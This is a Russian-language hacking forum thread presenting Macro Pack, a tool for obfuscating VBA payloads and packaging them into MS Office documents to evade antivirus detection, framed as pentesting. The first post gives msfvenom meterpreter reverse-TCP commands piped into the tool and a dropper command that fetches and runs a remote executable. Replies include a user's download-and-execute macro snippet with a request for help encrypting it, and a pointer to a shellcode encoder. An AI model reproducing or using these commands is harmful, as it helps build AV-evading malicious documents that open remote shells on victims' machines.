![]() |
Приветствую, сегодня хочу представить аудитории инструмент, целью которого является обфускация вашего, или где-то позаимствованного кода. Итогом будет, как обещают авторы, снижение агрессии на него АВ-программ. Я полагаю, не нужно обьяснять, что обфусцированные примеры не стоит постить на любимый многими «хакерами» ресурс.
Вот собственно, Macro Pack: https://forum.antichat.xyz/attachmen...4436848e10.png Macro Pack - это инструмент, используемый для автоматизации обфускации и генерации документов MS Office для проведения тестирования на проникновение. Macro Pack – позволяет обойти алгоритмы выявления вредоносного кода антивирусными программами и упростит преобразование vba –полезной нагрузки в окончательный документ Office. Более подробная информация находится тут: > sevagas/macro_pack Особенности:
Примечание: Цитата:
Установка: Код: Код:
git clone https://github.com/sevagas/macro_packКод: Код:
pip3 install -r requirements.txtПримечание. Для Windows вам необходимо загрузить вручную pywin32 > https://sourceforge.net/projects/pywin32/files/pywin32/ Справка: Код: Код:
macro_pack.py --helphttps://forum.antichat.xyz/attachmen...7586d399a9.png Использование: Обфускация полезной нагрузки в формате vba, сгенерированной msfvenom, и помещение результата в новый файл vba. Код: Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v meterobf.vbaКод: Код:
macro_pack.py -f empire.vba -o -W myDoc.docmКод: Код:
echo "https: //myurl.url/payload.exe" "drop.exe" | macro_pack.py -o -t DROPPER -x "drop.xlsm"Код: Код:
msfvenom.bat -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.exe -o -w \\ REMOTE-PC \ Share \ meter.docОбфусцируем VBA от Metasploit: Код: Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba –o 123.txtКод: Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v 1234.vbahttps://forum.antichat.xyz/attachmen...e19ddaf157.png Результат будет таким: https://forum.antichat.xyz/attachmen...1f58a08572.png Полагаю, инструмент окажется полезным и займет место в наборе начинающего/опытного пентестера. Спасибо за внимание |
Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте |
Цитата:
Код:
sudo apt install python3-pip |
У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ? Код: Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long |
Цитата:
сессию надо прокидывать метера |
я чето шеллкода тут не увидел)
если сравнить с этим https://forum.antichat.xyz/attachmen...01c1750216.png а так хотелось узнать, как его действительно можно обфусцировать) |
вот тут если что SHELLCODE за - Encod-ить можно) ecx86/shellcode_encoder
раз уж тема про него) |
| Время: 11:28 |